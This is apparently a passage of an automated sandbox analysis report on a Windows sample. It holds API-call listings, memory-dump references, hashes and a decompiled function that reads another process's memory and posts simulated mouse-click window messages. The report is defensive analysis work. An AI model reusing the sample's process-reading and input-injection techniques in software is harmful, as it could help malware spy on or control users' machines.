                                          • HeapAlloc.KERNEL32(?,?,?,?,00C7FAAC,?,?,00000000,00C6C7CA,?,?,?,?,00000008,00C68C59), ref: 00C82EE4
                                          • GetTickCount.KERNEL32 ref: 00C82EF1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AddressAllocCountCriticalHandleHeapInformationInitializeModuleProcQuerySectionSystemTick
                                          • String ID: GetSystemTimes$KERNEL32.DLL
                                          • API String ID: 3912391235-2746141200
                                          • Opcode ID: dbebd6719b1df7ea6f3e8ce633ee618c483ef52dc90e13ad19f630840d7e2c76
                                          • Instruction ID: 159941e4b6e4fc87869bf3bcb04b9e37420083f84e3de3690b2d9090def3e6b3
                                          • Opcode Fuzzy Hash: dbebd6719b1df7ea6f3e8ce633ee618c483ef52dc90e13ad19f630840d7e2c76
                                          • Instruction Fuzzy Hash: D0019234612F41D1FB16DB66FC59B5833A1FB88B51FC68225D80A02B70EF3C854AC708
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ZwQueryInformationProcess.NTDLL(?,?,KERNEL32.DLL,?,?,?,00000000,00000002,00000000,00000000,00C6491B,00000000,?,LoadLibraryA,?,00000000), ref: 00C65079
                                          • ReadProcessMemory.KERNEL32(?,?,KERNEL32.DLL,?,?,?,00000000,00000002,00000000,00000000,00C6491B,00000000,?,LoadLibraryA,?,00000000), ref: 00C650CF
                                          • ReadProcessMemory.KERNEL32(?,?,KERNEL32.DLL,?,?,?,00000000,00000002,00000000,00000000,00C6491B,00000000,?,LoadLibraryA,?,00000000), ref: 00C650F5
                                          • ReadProcessMemory.KERNEL32(?,?,KERNEL32.DLL,?,?,?,00000000,00000002,00000000,00000000,00C6491B,00000000,?,LoadLibraryA,?,00000000), ref: 00C65141
                                          • ReadProcessMemory.KERNEL32(?,?,KERNEL32.DLL,?,?,?,00000000,00000002,00000000,00000000,00C6491B,00000000,?,LoadLibraryA,?,00000000), ref: 00C651BA
                                          • StrRChrA.SHLWAPI(?,?,KERNEL32.DLL,?,?,?,00000000,00000002,00000000,00000000,00C6491B,00000000,?,LoadLibraryA,?,00000000), ref: 00C651F5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Process$MemoryRead$InformationQuery
                                          • String ID: KERNEL32.DLL
                                          • API String ID: 3059065599-2576044830
                                          • Opcode ID: 3fa409b58d0cfc8d0464434912f54dceb7c79e7910b056cbd8d2ed3be3b55fd4
                                          • Instruction ID: 14a7db013b93d90370c6a1298b6798b230e56f671e995934631996dcb2c32fe2
                                          • Opcode Fuzzy Hash: 3fa409b58d0cfc8d0464434912f54dceb7c79e7910b056cbd8d2ed3be3b55fd4
                                          • Instruction Fuzzy Hash: 0B51DF73314B859BDB20DF21E890B9A77A4F748B84F548125EF9D43B04DB38DA69CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CapsDesktopDevice$CloseCreateErrorLastReleaselstrcpy
                                          • String ID:
                                          • API String ID: 4025149134-0
                                          • Opcode ID: 6e68ebfd18c71ff72d00be8f06140cb88c5148bf6ba323c2d38a3150ca78b233
                                          • Instruction ID: a7503a165749042c3579dda13deef00f5ffba9e8c44a479288e61d93b178a306
                                          • Opcode Fuzzy Hash: 6e68ebfd18c71ff72d00be8f06140cb88c5148bf6ba323c2d38a3150ca78b233
                                          • Instruction Fuzzy Hash: B931D2363147809BE758DF22E904B5AB7A0F748B94F448129EF9E83B54DF38D469CB04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 50%
                                          			E00C799B0(signed int __edx, void* __rcx, void* __r8, void* __r9) {
                                          				void* __rbx;
                                          				void* __rdi;
                                          				void* __rsi;
                                          				void* __rbp;
                                          				void* _t131;
                                          				void* _t133;
                                          				int _t137;
                                          				int _t138;
                                          				long _t155;
                                          				signed int _t161;
                                          				void* _t169;
                                          				signed char _t172;
                                          				signed char _t176;
                                          				void* _t177;
                                          				signed int _t179;
                                          				signed int _t181;
                                          				signed int _t183;
                                          				signed int _t189;
                                          				signed int _t191;
                                          				signed int _t193;
                                          				signed int _t203;
                                          				signed int _t205;
                                          				void* _t223;
                                          				signed int _t244;
                                          				signed long long _t247;
                                          				intOrPtr _t248;
                                          				signed long long _t249;
                                          				intOrPtr _t264;
                                          				void* _t269;
                                          				void* _t290;
                                          				void* _t299;
                                          				long long _t300;
                                          				signed long long _t301;
                                          				void* _t302;
                                          				void* _t303;
                                          				void* _t304;
                                          				void* _t306;
                                          				void* _t311;
                                          				signed long long _t323;
                                          				signed long long _t325;
                                          				void* _t326;
                                          
                                          				_t306 = __r8;
                                          				_t187 = __edx;
                                          				_t1 = _t303 - 0x17; // 0xfe81
                                          				_t302 = _t1;
                                          				_t304 = _t303 - 0xb8;
                                          				r15d = r9d;
                                          				 *(_t302 + 0x67) = 0;
                                          				r12d = __edx;
                                          				r13d = r8d;
                                          				_t299 = __rcx;
                                          				_t131 = E00C6ADD8();
                                          				_t3 = _t249 + 1; // 0x1
                                          				_t205 = _t3;
                                          				if(_t131 > 5) {
                                          					L2:
                                          					 *(_t302 + 0x6f) = 0;
                                          					L3:
                                          					_t300 = _t299 + 0x18;
                                          					E00C78C30(_t187, _t300);
                                          					_t247 =  *((intOrPtr*)(_t299 + 0x38));
                                          					_t323 =  *((intOrPtr*)(_t247 + 0x118));
                                          					E00C78CF0();
                                          					_t133 = 0;
                                          					if(( *(_t247 + 0x124) & 0x0000ffff) == 0) {
                                          						__eflags =  *(_t299 + 0x260);
                                          						if(__eflags != 0) {
                                          							r9d = 1;
                                          							r8d = r15d;
                                          							_t187 = r13d;
                                          							E00C795C8(r13d, __eflags, _t249, _t299, _t299, _t300);
                                          							__eflags = 0;
                                          							 *(_t299 + 0x260) = 0;
                                          						}
                                          						E00C78C30(_t187, _t300);
                                          						_t247 =  *((intOrPtr*)(_t299 + 0x38));
                                          						_t323 =  *((intOrPtr*)(_t247 + 0x118));
                                          						E00C78CF0();
                                          						__eflags = _t323;
                                          						if(_t323 != 0) {
                                          							r8d = 0;
                                          							_t187 = 0;
                                          							_t172 = E00C81978(_t177, 0, _t247, _t299, _t290) & 0x0000ffff;
                                          						} else {
                                          							_t172 = 0;
                                          						}
                                          						goto L13;
                                          					} else {
                                          						_t10 = _t247 + 1; // 0x1
                                          						_t176 = _t10;
                                          						if((_t176 & r12b) != 0) {
                                          							_t211 =  *(_t299 + 0x260);
                                          							if( *(_t299 + 0x260) == 0) {
                                          								GetWindowRect();
                                          								 *(_t299 + 0x260) = _t176;
                                          							}
                                          							r9d = 0;
                                          							r8d = r15d;
                                          							_t187 = r13d;
                                          							E00C795C8(r13d, _t211, _t249, _t299, _t299, _t300);
                                          							_t133 = 0;
                                          						}
                                          						if((r12b & 0x00000004) == 0) {
                                          							L12:
                                          							_t172 =  *(_t302 + 0x67);
                                          							L13:
                                          							_t137 = E00C78C30(_t187, _t300);
                                          							 *( *((intOrPtr*)(_t299 + 0x38)) + 4) = r13d;
                                          							_t292 =  *((intOrPtr*)(_t299 + 0x38));
                                          							 *( *((intOrPtr*)(_t299 + 0x38)) + 8) = r15d;
                                          							E00C78CF0();
                                          							if(r12d == 0) {
                                          								L77:
                                          								return _t137;
                                          							}
                                          							 *((long long*)(_t302 - 0x51)) = _t300;
                                          							_t189 = r12d & 0x00000002;
                                          							_t179 = r12d & 0x00000004;
                                          							 *(_t302 + 0x77) = _t189;
                                          							 *(_t302 + 0x5f) = _t179;
                                          							_t138 = 0;
                                          							if(_t189 == 0) {
                                          								__eflags = _t179;
                                          								if(_t179 == 0) {
                                          									r8d = 1;
                                          									L25:
                                          									_t191 = r12d & 0x00000020;
                                          									_t181 = r12d & 0x00000040;
                                          									 *(_t302 - 0x49) = _t191;
                                          									 *(_t302 - 0x45) = _t181;
                                          									if(_t191 == 0) {
                                          										__eflags = _t181;
                                          										if(_t181 == 0) {
                                          											r8d = 1;
                                          											L30:
                                          											_t193 = r12d & 0x00000008;
                                          											_t183 = r12d & 0x00000010;
                                          											 *(_t302 - 0x41) = _t193;
                                          											 *(_t302 - 0x3d) = _t183;
                                          											if(_t193 != 0) {
                                          												L33:
                                          												E00C81978(_t183, 2, _t247, _t299, _t292);
                                          												_t138 = 1;
                                          												L34:
                                          												_t40 = _t302 - 0x51; // 0xfe30
                                          												_t311 = _t40;
                                          												 *(_t304 + 0x28) = _t138;
                                          												_t42 = _t302 + 0x67; // 0xfee8
                                          												_t307 = _t42;
                                          												 *(_t304 + 0x20) = 0;
                                          												_t137 = E00C7C47C(_t299,  *( *((intOrPtr*)(_t299 + 0x38)) + 4), _t42, _t311);
                                          												_t301 = _t247;
                                          												_t223 = ( *(_t302 + 0x67) & 0x0000ffff) - 0xa - 7;
                                          												if(_t223 <= 0) {
                                          													__imp__GetWindowLongPtrA();
                                          													asm("dec eax");
                                          													if(_t223 < 0) {
                                          														_t137 = E00C7C024(_t247, _t311);
                                          														if(_t137 == 0) {
                                          															_t137 = GetParent();
                                          															_t301 =  !=  ? _t247 : _t301;
                                          														}
                                          													}
                                          												}
                                          												if(_t301 == 0) {
                                          													L44:
                                          													__eflags = _t323;
                                          													if(_t323 == 0) {
                                          														goto L52;
                                          													}
                                          													_t137 = E00C7C050(_t247, _t249, _t299 + 0x88, _t323, _t301);
                                          													__eflags = _t137;
                                          													if(_t137 == 0) {
                                          														L50:
                                          														__eflags = r12d - 0x8001;
                                          														if(r12d != 0x8001) {
                                          															r9d = 0;
                                          															r8d = 0;
                                          															__eflags = 0;
                                          															_t55 = _t311 + 1; // 0x1
                                          															 *(_t304 + 0x20) = _t55;
                                          															_t137 = E00C78CFC(0, 0, _t247, _t249, _t299, _t302, _t307);
                                          														}
                                          														goto L52;
                                          													}
                                          													__eflags = _t301;
                                          													if(_t301 == 0) {
                                          														L49:
                                          														_t301 = _t323;
                                          														goto L52;
                                          													}
                                          													__eflags = _t323 - _t301;
                                          													if(_t323 == _t301) {
                                          														goto L49;
                                          													}
                                          													__eflags = _t172 & 0x00000007;
                                          													if((_t172 & 0x00000007) == 0) {
                                          														goto L50;
                                          													}
                                          													goto L49;
                                          												} else {
                                          													_t137 = E00C7BB64(_t247, _t249, _t299 + 0x88, _t301, _t311);
                                          													if((_t137 & 0x00000001) == 0) {
                                          														goto L44;
                                          													}
                                          													_t137 = 0;
                                          													if( *(_t299 + 0x260) != 0) {
                                          														goto L44;
                                          													}
                                          													if(_t301 != _t323) {
                                          														_t155 = GetWindowThreadProcessId();
                                          														_t307 = _t301;
                                          														 *(_t304 + 0x20) = 1;
                                          														r9d = 0;
                                          														E00C78CFC(_t155, 0, _t247, _t249, _t299, _t302, _t301);
                                          													}
                                          													_t137 = 1;
                                          													 *(_t302 + 0x67) = 1;
                                          													L52:
                                          													if(_t301 == 0) {
                                          														goto L77;
                                          													}
                                          													_t57 = _t302 - 0x39; // 0xfe48
                                          													_t295 = _t57;
                                          													 *((intOrPtr*)(_t302 - 0x39)) = 0x3c;
                                          													_t137 = GetWindowInfo(??, ??);
                                          													if(_t137 == 0) {
                                          														goto L77;
                                          													}
                                          													r14d = r15w & 0xffffffff;
                                          													_t325 = _t323 << 0x00000010 | _t247;
                                          													_t59 = _t249 + 1; // 0x1
                                          													if( *(_t302 + 0x67) == _t59) {
                                          														_t295 = _t301;
                                          														if((E00C7BB64(_t247, _t249, _t299 + 0x88, _t301, _t311) & 0x00000002) == 0) {
                                          															r15w = r15w -  *((intOrPtr*)(_t302 - 0x21));
                                          															r13w = r13w -  *((intOrPtr*)(_t302 - 0x25));
                                          															_t249 = _t249 << 0x00000010 | _t247;
                                          															__eflags = _t249;
                                          														} else {
                                          															_t249 = _t325;
                                          														}
                                          													}
                                          													_t248 =  *((intOrPtr*)(_t299 + 0x38));
                                          													_t67 = _t302 + 7; // 0xfe88
                                          													 *((long long*)(_t304 + 0x30)) = _t67;
                                          													r9d = 0;
                                          													 *(_t304 + 0x28) = 0x3e8;
                                          													 *(_t304 + 0x20) = 2;
                                          													_t72 = _t311 + 3; // 0x3
                                          													r8d = _t72;
                                          													SendMessageTimeoutA(??, ??, ??, ??, ??, ??, ??);
                                          													r13d =  *(_t302 + 0x6f);
                                          													_t326 = E00C809D4;
                                          													_t137 = 0;
                                          													_t264 = 0xc78f34;
                                          													if( *(_t302 + 0x77) == 0) {
                                          														__eflags =  *(_t302 + 0x5f);
                                          														if( *(_t302 + 0x5f) == 0) {
                                          															goto L63;
                                          														}
                                          														 *(_t304 + 0x40) = _t325;
                                          														 *(_t304 + 0x38) = _t249;
                                          														 *((intOrPtr*)(_t304 + 0x30)) = 0xa2;
                                          														 *(_t304 + 0x28) = 0x202;
                                          														goto L62;
                                          													} else {
                                          														 *(_t304 + 0x40) = _t325;
                                          														 *(_t304 + 0x38) = _t249;
                                          														 *((intOrPtr*)(_t304 + 0x30)) = 0xa1;
                                          														 *(_t304 + 0x28) = 0x201;
                                          														L62:
                                          														_t307 =  *((intOrPtr*)(_t302 - 0x51));
                                          														 *(_t304 + 0x20) =  *(_t302 + 0x67) & 0x0000ffff;
                                          														_t322 =  ==  ? _t264 : _t326;
                                          														_t295 = _t301;
                                          														 *((long long*)( ==  ? _t264 : _t326))();
                                          														_t264 = 0xc78f34;
                                          														_t137 = 0;
                                          														L63:
                                          														if( *(_t302 - 0x49) == _t137) {
                                          															__eflags =  *(_t302 - 0x45) - _t137;
                                          															if( *(_t302 - 0x45) == _t137) {
                                          																L68:
                                          																if( *(_t302 - 0x41) == _t137) {
                                          																	__eflags =  *(_t302 - 0x3d) - _t137;
                                          																	if( *(_t302 - 0x3d) == _t137) {
                                          																		L73:
                                          																		if((0x00000001 & r12b) != 0) {
                                          																			_t307 =  *((intOrPtr*)(_t302 - 0x51));
                                          																			_t248 = 0xc78f34;
                                          																			 *(_t304 + 0x40) = _t325;
                                          																			 *(_t304 + 0x38) = _t249;
                                          																			_t244 = r13d;
                                          																			 *((intOrPtr*)(_t304 + 0x30)) = 0xa0;
                                          																			_t295 = _t301;
                                          																			_t327 =  ==  ? 0xc78f34 : _t326;
                                          																			 *(_t304 + 0x28) = 0x200;
                                          																			 *(_t304 + 0x20) =  *(_t302 + 0x67) & 0x0000ffff;
                                          																			_t137 =  *((long long*)( ==  ? 0xc78f34 : _t326))();
                                          																		}
                                          																		asm("inc ecx");
                                          																		if(_t244 < 0) {
                                          																			r8d = 0;
                                          																			E00C81978(1, 0, _t248, _t299, _t295);
                                          																			E00C7F480(_t249, _t299);
                                          																			E00C7BD68(_t248, _t295);
                                          																			r8d =  *(_t302 + 0x7f) & 0x0000ffff;
                                          																			_t269 =  ==  ? _t301 : _t248;
                                          																			_t137 = PostMessageA(??, ??, ??, ??);
                                          																		}
                                          																		goto L77;
                                          																	}
                                          																	 *(_t304 + 0x40) = _t325;
                                          																	 *(_t304 + 0x38) = _t249;
                                          																	 *((intOrPtr*)(_t304 + 0x30)) = 0xa5;
                                          																	 *(_t304 + 0x28) = 0x205;
                                          																	L72:
                                          																	_t307 =  *((intOrPtr*)(_t302 - 0x51));
                                          																	_t248 = 0xc78f34;
                                          																	_t295 = _t301;
                                          																	_t318 =  ==  ? 0xc78f34 : _t326;
                                          																	 *(_t304 + 0x20) =  *(_t302 + 0x67) & 0x0000ffff;
                                          																	_t137 =  *((long long*)( ==  ? 0xc78f34 : _t326))();
                                          																	goto L73;
                                          																}
                                          																 *(_t304 + 0x40) = _t325;
                                          																 *(_t304 + 0x38) = _t249;
                                          																 *((intOrPtr*)(_t304 + 0x30)) = 0xa4;
                                          																 *(_t304 + 0x28) = 0x204;
                                          																goto L72;
                                          															}
                                          															 *(_t304 + 0x40) = _t325;
                                          															 *(_t304 + 0x38) = _t249;
                                          															 *((intOrPtr*)(_t304 + 0x30)) = 0xa8;
                                          															 *(_t304 + 0x28) = 0x208;
                                          															L67:
                                          															_t307 =  *((intOrPtr*)(_t302 - 0x51));
                                          															 *(_t304 + 0x20) =  *(_t302 + 0x67) & 0x0000ffff;
                                          															_t320 =  ==  ? _t264 : _t326;
                                          															_t295 = _t301;
                                          															 *((long long*)( ==  ? _t264 : _t326))();
                                          															_t137 = 0;
                                          															goto L68;
                                          														}
                                          														 *(_t304 + 0x40) = _t325;
                                          														 *(_t304 + 0x38) = _t249;
                                          														 *((intOrPtr*)(_t304 + 0x30)) = 0xa7;
                                          														 *(_t304 + 0x28) = 0x207;
                                          														goto L67;
                                          													}
                                          												}
                                          											}
                                          											if(_t183 == 0) {
                                          												goto L34;
                                          											}
                                          											r8d = 0;
                                          											goto L33;
                                          										}
                                          										r8d = 0;
                                          									}
                                          									E00C81978(_t181, 4, _t247, _t299, _t292);
                                          									r8d = 1;
                                          									_t138 = r8d;
                                          									goto L30;
                                          								}
                                          								r8d = 0;
                                          								_t34 = _t306 + 1; // 0x1
                                          								_t203 = _t34;
                                          								L16:
                                          								E00C81978(_t179, _t203, _t247, _t299, _t292);
                                          								r8d = 1;
                                          								_t138 = r8d;
                                          								goto L25;
                                          							}
                                          							_t29 = _t300 + 1; // 0x1
                                          							_t161 = _t29;
                                          							r8d = _t161;
                                          							_t203 = _t161;
                                          							goto L16;
                                          						}
                                          						_t214 =  *(_t299 + 0x260) - _t133;
                                          						if( *(_t299 + 0x260) != _t133) {
                                          							r9d = _t176;
                                          							r8d = r15d;
                                          							E00C795C8(r13d, _t214, _t249, _t299, _t299, _t300);
                                          							 *(_t299 + 0x260) = 0;
                                          						}
                                          						r9d = 0;
                                          						 *(_t304 + 0x20) = _t176;
                                          						r8d = 0;
                                          						_t187 = 0;
                                          						E00C78CFC(0, 0, _t247, _t249, _t299, _t302, _t306);
                                          						goto L12;
                                          					}
                                          				}
                                          				_t169 = E00C6ADE8();
                                          				 *(_t302 + 0x6f) = _t205;
                                          				if(_t169 < 3) {
                                          					goto L3;
                                          				}
                                          				goto L2;
                                          			}
                                          0x00c799b0
                                          0x00c799b0
                                          0x00c799bd
                                          0x00c799bd
                                          0x00c799c2
                                          0x00c799cb
                                          0x00c799ce
                                          0x00c799d2
                                          0x00c799d5
                                          0x00c799d8
                                          0x00c799db
                                          0x00c799e0
                                          0x00c799e0
                                          0x00c799e6
                                          0x00c799f5
                                          0x00c799f5
                                          0x00c799f8
                                          0x00c799f8
                                          0x00c799ff
                                          0x00c79a04
                                          0x00c79a0b
                                          0x00c79a19
                                          0x00c79a1e
                                          0x00c79a23
                                          0x00c79b02
                                          0x00c79b08
                                          0x00c79b0a
                                          0x00c79b10
                                          0x00c79b13
                                          0x00c79b19
                                          0x00c79b1e
                                          0x00c79b20
                                          0x00c79b20
                                          0x00c79b29
                                          0x00c79b2e
                                          0x00c79b35
                                          0x00c79b3c
                                          0x00c79b43
                                          0x00c79b46
                                          0x00c79b4f
                                          0x00c79b52
                                          0x00c79b5c
                                          0x00c79b48
                                          0x00c79b48
                                          0x00c79b48
                                          0x00000000
                                          0x00c79a29
                                          0x00c79a29
                                          0x00c79a29
                                          0x00c79a2f
                                          0x00c79a31
                                          0x00c79a37
                                          0x00c79a43
                                          0x00c79a49
                                          0x00c79a49
                                          0x00c79a4f
                                          0x00c79a52
                                          0x00c79a55
                                          0x00c79a5b
                                          0x00c79a60
                                          0x00c79a60
                                          0x00c79a66
                                          0x00c79a9d
                                          0x00c79a9d
                                          0x00c79aa0
                                          0x00c79aa3
                                          0x00c79aaf
                                          0x00c79ab3
                                          0x00c79ab7
                                          0x00c79abb
                                          0x00c79ac5
                                          0x00c79f7b
                                          0x00c79f8e
                                          0x00c79f8e
                                          0x00c79ace
                                          0x00c79ad2
                                          0x00c79ad8
                                          0x00c79adb
                                          0x00c79ade
                                          0x00c79ae1
                                          0x00c79ae5
                                          0x00c79b64
                                          0x00c79b66
                                          0x00c79b74
                                          0x00c79b7a
                                          0x00c79b80
                                          0x00c79b83
                                          0x00c79b86
                                          0x00c79b89
                                          0x00c79b8e
                                          0x00c79ba8
                                          0x00c79baa
                                          0x00c79bb1
                                          0x00c79bb7
                                          0x00c79bbd
                                          0x00c79bc0
                                          0x00c79bc3
                                          0x00c79bc6
                                          0x00c79bcb
                                          0x00c79bd4
                                          0x00c79bdc
                                          0x00c79be1
                                          0x00c79be6
                                          0x00c79bea
                                          0x00c79bea
                                          0x00c79bee
                                          0x00c79bf2
                                          0x00c79bf2
                                          0x00c79bf9
                                          0x00c79c02
                                          0x00c79c0b
                                          0x00c79c12
                                          0x00c79c16
                                          0x00c79c20
                                          0x00c79c26
                                          0x00c79c2b
                                          0x00c79c30
                                          0x00c79c37
                                          0x00c79c3c
                                          0x00c79c45
                                          0x00c79c45
                                          0x00c79c37
                                          0x00c79c2b
                                          0x00c79c4c
                                          0x00c79ca2
                                          0x00c79ca2
                                          0x00c79ca5
                                          0x00000000
                                          0x00000000
                                          0x00c79cb1
                                          0x00c79cb6
                                          0x00c79cb8
                                          0x00c79cce
                                          0x00c79cce
                                          0x00c79cd5
                                          0x00c79cd7
                                          0x00c79cda
                                          0x00c79cdd
                                          0x00c79ce2
                                          0x00c79ce6
                                          0x00c79cea
                                          0x00c79cea
                                          0x00000000
                                          0x00c79cd5
                                          0x00c79cba
                                          0x00c79cbd
                                          0x00c79cc9
                                          0x00c79cc9
                                          0x00000000
                                          0x00c79cc9
                                          0x00c79cbf
                                          0x00c79cc2
                                          0x00000000
                                          0x00000000
                                          0x00c79cc4
                                          0x00c79cc7
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c79c4e
                                          0x00c79c58
                                          0x00c79c5f
                                          0x00000000
                                          0x00000000
                                          0x00c79c61
                                          0x00c79c69
                                          0x00000000
                                          0x00000000
                                          0x00c79c6e
                                          0x00c79c75
                                          0x00c79c7b
                                          0x00c79c88
                                          0x00c79c8e
                                          0x00c79c92
                                          0x00c79c92
                                          0x00c79c97
                                          0x00c79c9c
                                          0x00c79cef
                                          0x00c79cf4
                                          0x00000000
                                          0x00000000
                                          0x00c79cfa
                                          0x00c79cfa
                                          0x00c79cfe
                                          0x00c79d08
                                          0x00c79d10
                                          0x00000000
                                          0x00000000
                                          0x00c79d1a
                                          0x00c79d22
                                          0x00c79d25
                                          0x00c79d2c
                                          0x00c79d35
                                          0x00c79d3f
                                          0x00c79d46
                                          0x00c79d4b
                                          0x00c79d5c
                                          0x00c79d5c
                                          0x00c79d41
                                          0x00c79d41
                                          0x00c79d41
                                          0x00c79d3f
                                          0x00c79d5f
                                          0x00c79d63
                                          0x00c79d67
                                          0x00c79d6c
                                          0x00c79d6f
                                          0x00c79d7a
                                          0x00c79d88
                                          0x00c79d88
                                          0x00c79d8c
                                          0x00c79d92
                                          0x00c79d96
                                          0x00c79d9d
                                          0x00c79d9f
                                          0x00c79da9
                                          0x00c79dc7
                                          0x00c79dca
                                          0x00000000
                                          0x00000000
                                          0x00c79dcc
                                          0x00c79dd1
                                          0x00c79dd6
                                          0x00c79dde
                                          0x00000000
                                          0x00c79dab
                                          0x00c79dab
                                          0x00c79db0
                                          0x00c79db5
                                          0x00c79dbd
                                          0x00c79de6
                                          0x00c79dee
                                          0x00c79df8
                                          0x00c79dfd
                                          0x00c79e01
                                          0x00c79e07
                                          0x00c79e0a
                                          0x00c79e11
                                          0x00c79e13
                                          0x00c79e16
                                          0x00c79e34
                                          0x00c79e37
                                          0x00c79e79
                                          0x00c79e7c
                                          0x00c79e9a
                                          0x00c79e9d
                                          0x00c79ee4
                                          0x00c79eec
                                          0x00c79eee
                                          0x00c79ef2
                                          0x00c79ef9
                                          0x00c79f02
                                          0x00c79f07
                                          0x00c79f0a
                                          0x00c79f12
                                          0x00c79f15
                                          0x00c79f19
                                          0x00c79f28
                                          0x00c79f2d
                                          0x00c79f2d
                                          0x00c79f30
                                          0x00c79f35
                                          0x00c79f37
                                          0x00c79f3f
                                          0x00c79f4a
                                          0x00c79f52
                                          0x00c79f57
                                          0x00c79f65
                                          0x00c79f75
                                          0x00c79f75
                                          0x00000000
                                          0x00c79f35
                                          0x00c79e9f
                                          0x00c79ea4
                                          0x00c79ea9
                                          0x00c79eb1
                                          0x00c79eb9
                                          0x00c79eb9
                                          0x00c79ebd
                                          0x00c79ece
                                          0x00c79ed1
                                          0x00c79edc
                                          0x00c79ee1
                                          0x00000000
                                          0x00c79ee1
                                          0x00c79e7e
                                          0x00c79e83
                                          0x00c79e88
                                          0x00c79e90
                                          0x00000000
                                          0x00c79e90
                                          0x00c79e39
                                          0x00c79e3e
                                          0x00c79e43
                                          0x00c79e4b
                                          0x00c79e53
                                          0x00c79e5b
                                          0x00c79e65
                                          0x00c79e6a
                                          0x00c79e6e
                                          0x00c79e74
                                          0x00c79e77
                                          0x00000000
                                          0x00c79e77
                                          0x00c79e18
                                          0x00c79e1d
                                          0x00c79e22
                                          0x00c79e2a
                                          0x00000000
                                          0x00c79e2a
                                          0x00c79da9
                                          0x00c79c4c
                                          0x00c79bcf
                                          0x00000000
                                          0x00000000
                                          0x00c79bd1
                                          0x00000000
                                          0x00c79bd1
                                          0x00c79bac
                                          0x00c79bac
                                          0x00c79b98
                                          0x00c79b9d
                                          0x00c79ba3
                                          0x00000000
                                          0x00c79ba3
                                          0x00c79b68
                                          0x00c79b6b
                                          0x00c79b6b
                                          0x00c79aef
                                          0x00c79af2
                                          0x00c79af7
                                          0x00c79afd
                                          0x00000000
                                          0x00c79afd
                                          0x00c79ae7
                                          0x00c79ae7
                                          0x00c79aea
                                          0x00c79aed
                                          0x00000000
                                          0x00c79aed
                                          0x00c79a68
                                          0x00c79a6e
                                          0x00c79a70
                                          0x00c79a73
                                          0x00c79a7c
                                          0x00c79a83
                                          0x00c79a83
                                          0x00c79a89
                                          0x00c79a8c
                                          0x00c79a90
                                          0x00c79a93
                                          0x00c79a98
                                          0x00000000
                                          0x00c79a98
                                          0x00c79a23
                                          0x00c799e8
                                          0x00c799ed
                                          0x00c799f3
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          • GetWindowRect.USER32 ref: 00C79A43
                                          • GetWindowLongPtrA.USER32 ref: 00C79C20
                                          • GetParent.USER32 ref: 00C79C3C
                                          • GetWindowThreadProcessId.USER32 ref: 00C79C75
                                          • GetWindowInfo.USER32 ref: 00C79D08
                                          • SendMessageTimeoutA.USER32 ref: 00C79D8C
                                            • Part of subcall function 00C7C050: IsWindow.USER32 ref: 00C7C06A
                                            • Part of subcall function 00C7C050: GetAncestor.USER32(?,?,?,00C7C19D), ref: 00C7C093
                                          • PostMessageA.USER32 ref: 00C79F75
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
• Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
• Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
• Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
• Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$Message$AncestorInfoLongParentPostProcessRectSendThreadTimeout
                                          • String ID:
                                          • API String ID: 1491194875-0
                                          • Opcode ID: a808a7ab5fae6bca2803e4c6983bc2374f1f71c65badd49f090b7e07db90929d
                                          • Instruction ID: 0408f32014e0d68e95e8ab7dce12ede75056c9f1f76234f97fa272d5e09298ea
                                          • Opcode Fuzzy Hash: a808a7ab5fae6bca2803e4c6983bc2374f1f71c65badd49f090b7e07db90929d
                                          • Instruction Fuzzy Hash: CEE1DE327147A18BEB24DF66E5407AE77A1F785B88F40812AEE4E57F58DB38C506CB04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
• Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
• Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
• Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
• Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Process$MemoryRead$InformationQuerymemset
                                          • String ID:
                                          • API String ID: 1463847938-0
                                          • Opcode ID: 159bf29e0f137b6d19e6b42216e7bb2768e01392b9899e155e9f77c7bead5438
